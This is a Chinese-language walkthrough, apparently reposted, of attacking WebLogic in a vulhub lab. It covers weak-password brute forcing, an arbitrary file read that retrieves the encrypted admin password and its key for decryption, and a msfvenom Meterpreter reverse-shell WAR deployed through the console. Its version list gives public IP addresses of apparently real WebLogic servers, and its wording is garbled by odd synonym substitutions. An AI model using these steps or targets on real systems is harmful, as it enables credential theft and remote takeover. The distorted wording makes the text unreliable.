WebLogic：弱口令,木马反弹连接

weblogic

WebLogic 是 Oracle 公司开辟的应用服务器，主要用作开辟、集成、摆设和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。它在历史上曾出现过多个安全弊端，其中包括弱口令、恣意文件上传、SSRF、反序列化弊端等
常见版本：

   WebLogic Server 10.x   http://94.101.140.201:7001/    WebLogic Server 11.x    http://64.44.157.94:7001/    较为少见 12 和 8 版本    12：  http://124.128.249.189:7001/    8：  http://129.126.221.67:7001/  默认服务端口：7001


vulhub靶场使用

vulhub：多个靶场的集合
1.关闭防火墙

   systemctl stop firewalld.service 
  2.关闭selinux系统防护[具体见主页]

   setenforce 0
  3.开启docker服务

   systemctl restart docker.service 
  4.进入vulhub靶场目次

   cd /var/local/vulhub-master/weblogic/weak_password
  5.开启靶场[背景开启]

   docker-compose up -d
  6.查看靶场信息

1. [root@localhost weak_password]# docker ps
2. CONTAINER ID   IMAGE                           COMMAND              CREATED          STATUS          PORTS                                                                                  NAMES
3. 5ebeb02ea02a   vulhub/weblogic:10.3.6.0-2017   "startWebLogic.sh"   54 minutes ago   Up 54 seconds   0.0.0.0:5556->5556/tcp, :::5556->5556/tcp, 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp   weak_password_weblogic_

复制代码

7.访问靶场 

http://192.168.10.5:7001/

8.关闭靶场[切换至靶场目次下]

 docker-compose stop

1. [root@localhost weak_password]# docker-compose stop
2. Stopping weak_password_weblogic_1 ... done

复制代码

9.切换靶场 [报错重复步调1~3]

1. [root@localhost weak_password]# cd ..
2. [root@localhost weblogic]# ls
3. CVE-2017-10271  CVE-2018-2628  CVE-2018-2894  CVE-2020-14882  CVE-2023-21839  ssrf  weak_password
4. [root@localhost weblogic]# cd ssrf/
5. [root@localhost ssrf]# docker-compose up -d
6. Starting ssrf_redis_1 ... done
7. Starting ssrf_weblogic_1 ... done
8. [root@localhost ssrf]#

复制代码

弱口令爆破

weblogic弱口令：
用户名密码systempasswordweblogicweblogicadminsecruityjoepasswordmarypasswordsystemsercuritywlcsystemwlcsystemweblogicOracle@123 1.抓取数据包

2.发送攻击者模块，攻击模式：pitchfork

3.标志载荷，导入弱口令


 

4.开始爆破

 5.拿到用户信息并登录

恣意文件读取[应用步伐弊端读取weblogic密码] 

通过弊端读取weblogic密钥及密文，使用AES解密出背景密码

1. 密文绝对路径：
2. /root/Oracle/Middleware/user_projects/domains/base_domain/security/Se
3. rializedSystemIni.dat
4. 密钥绝对路径：
5. /root/Oracle/Middleware/user_projects/domains/base_domain/config/con
6. fig.xml

复制代码

弊端接口路径：

1. http://192.168.10.5:7001/hello/file.jsp?path=/etc/passwd

复制代码

  使用bp获取密文并解密

  1.抓取接口数据包

2.改为密码密文路径，获取响应

        请求:

        响应：

3.响应视图修改为 Hex ，选中乱码部门的16进制数据，右键

生存为.dat文件

 

4.读取配置文件，生存密钥

config.xml是base_domain的全局配置文件
其中<node-manager-password-encrypted>标签的值为"密钥"

5.下载解密工具，进行解密

1. 地址：https://github.com/TideSec/Decrypt_Weblogic_Password
2. 工具路径：Decrypt_Weblogic_Password-master\Tools5-weblogic_decrypt

复制代码

扩展：使用.bat脚本快速启动工具

创建.bat文件将其生存至工具目次

1. @echo off
2. echo Starting the weblogic_decrypt.jar application...
3. java -jar weblogic_decrypt.jar
4. echo Application has ended. Press any key to exit.
5. pause > nul

复制代码

建立反弹连接

1.kali使用msf生成木马

1. msfvenom -p java/meterpreter/reverse_tcp lhost=攻击者ip lport=4444 -f war -o java.war

复制代码

2.将木马摆设入服务器

1. 点击左侧 部署->安装->上载文件->上传war包->（全部下一步）-> 完成

复制代码

 

3.监听连接端口

1. msfconsole
2. use exploit/multi/handler
3. set payload java/meterpreter/reverse_tcp
4. set LHOST 192.168.10.128
5. set LPORT 4444
6. exploit

复制代码

 

4.访问木马路径，建立连接

1. http://192.168.10.5:7001/java

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。